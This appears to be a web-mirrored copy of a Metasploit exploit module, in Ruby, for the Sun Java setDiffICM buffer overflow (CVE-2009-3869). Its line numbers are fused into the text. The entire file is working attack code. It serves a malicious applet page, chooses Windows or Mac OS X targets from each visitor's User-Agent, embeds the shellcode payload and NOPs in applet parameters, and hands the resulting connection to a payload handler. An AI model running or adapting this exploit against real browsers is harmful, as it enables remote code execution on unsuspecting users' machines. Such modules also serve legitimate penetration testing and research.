CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/browser/java_setdifficm_bof.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78#9# This module acts as an HTTP server10#11include Msf::Exploit::Remote::HttpServer::HTML1213def initialize(info = {})14super(update_info(info,15'Name' => 'Sun Java JRE AWT setDiffICM Buffer Overflow',16'Description' => %q{17This module exploits a flaw in the setDiffICM function in the Sun JVM.1819The payload is serialized and passed to the applet via PARAM tags. It must be20a native payload.2122The effected Java versions are JDK and JRE 6 Update 16 and earlier,23JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and24earlier, and SDK and JRE 1.3.1_26 and earlier.2526NOTE: Although all of the above versions are reportedly vulnerable, only271.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.28},29'License' => MSF_LICENSE,30'Author' =>31[32'jduck'33],34'References' =>35[36[ 'CVE', '2009-3869' ],37[ 'OSVDB', '59710' ],38[ 'BID', '36881' ],39[ 'ZDI', '09-078' ]40],41'Payload' =>42{43'Space' => 1024,44'BadChars' => '',45'DisableNops' => true,46},47'Platform' => %w{ win osx },48'Targets' =>49[50=begin5152No automatic targetting for now ...5354[ 'J2SE 1.6_16 Automatic',55{56'Platform' => %w{ linux osx win },57'Arch' => [ARCH_X86, ARCH_PPC]58}59],60=end61[ 'J2SE 1.6_16 on Windows x86',62{63'Platform' => 'win',64'Arch' => ARCH_X8665}66],67[ 'J2SE 1.6_16 on Mac OS X PPC',68{69'Platform' => 'osx',70'Arch' => ARCH_PPC,71}72],73[ 'J2SE 1.6_16 on Mac OS X x86',74{75'Platform' => 'osx',76'Arch' => ARCH_X86,77}78],79],80'DefaultTarget' => 0,81'DisclosureDate' => '2009-11-04'82))83end848586def on_request_uri(cli, req)8788# Create a cached mapping between IP and detected target89@targetcache ||= {}90@targetcache[cli.peerhost] ||= {}91@targetcache[cli.peerhost][:update] = Time.now.to_i9293if (target.name =~ /Automatic/)94case req.headers['User-Agent']95when /Windows/i96print_status("Choosing a Windows target")97@targetcache[cli.peerhost][:target] = self.targets[1]98when /PPC Mac OS X/i99print_status("Choosing a Mac OS X PPC target")100@targetcache[cli.peerhost][:target] = self.targets[2]101when /Intel Mac OS X/i102print_status("Choosing a Mac OS X x86 target")103@targetcache[cli.peerhost][:target] = self.targets[3]104else105print_status("Unknown target for: #{req.headers['User-Agent']}")106end107end108109# Clean the cache110rmq = []111@targetcache.each_key do |addr|112if (Time.now.to_i > @targetcache[addr][:update]+60)113rmq.push addr114end115end116117rmq.each {|addr| @targetcache.delete(addr) }118119120# Request processing121if (not req.uri.match(/\.jar$/i))122123# Redirect to the base directory so the applet code loads...124if (not req.uri.match(/\/$/))125print_status("Sending redirect so path ends with / ...")126send_redirect(cli, get_resource() + '/', '')127return128end129130# Display the applet loading HTML131print_status("Sending HTML")132send_response_html(cli, generate_html(payload.encoded),133{134'Content-Type' => 'text/html',135'Pragma' => 'no-cache'136})137return138end139140# Send the actual applet over141print_status("Sending applet")142send_response(cli, generate_applet(cli, req),143{144'Content-Type' => 'application/octet-stream',145'Pragma' => 'no-cache'146})147148# Handle the payload149handler(cli)150end151152153def generate_html(pl)154155html = <<-EOF156<html>157<head>158<!-- <meta http-equiv=refresh content=10 /> -->159</head>160<body>161<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>162<param name='sc' value='SCODE' />163<param name='np' value='NOPS' />164</applet>165</body>166</html>167EOF168# finalize html169jar_name = rand_text_alphanumeric(32)+".jar"170html.gsub!(/JARNAME/, jar_name)171172# put payload into html173debug_payload = false174pload = ""175pload << "\xcc" if debug_payload176pload << pl177if ((pload.length % 4) > 0)178pload << rand_text((4 - (pload.length % 4)))179end180if debug_payload181print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))182end183html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))184185# put nops into html186nops = "\x90\x90\x90\x90"187html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))188#print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))189190return html191192end193194195def exploit196path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3869.jar")197fd = File.open(path, "rb")198@jar_data = fd.read(fd.stat.size)199fd.close200201super202end203204205def generate_applet(cli, req)206207this_target = nil208if (target.name =~ /Automatic/)209if (@targetcache[cli.peerhost][:target])210this_target = @targetcache[cli.peerhost][:target]211else212return ''213end214else215this_target = target216end217218return @jar_data219end220end221222223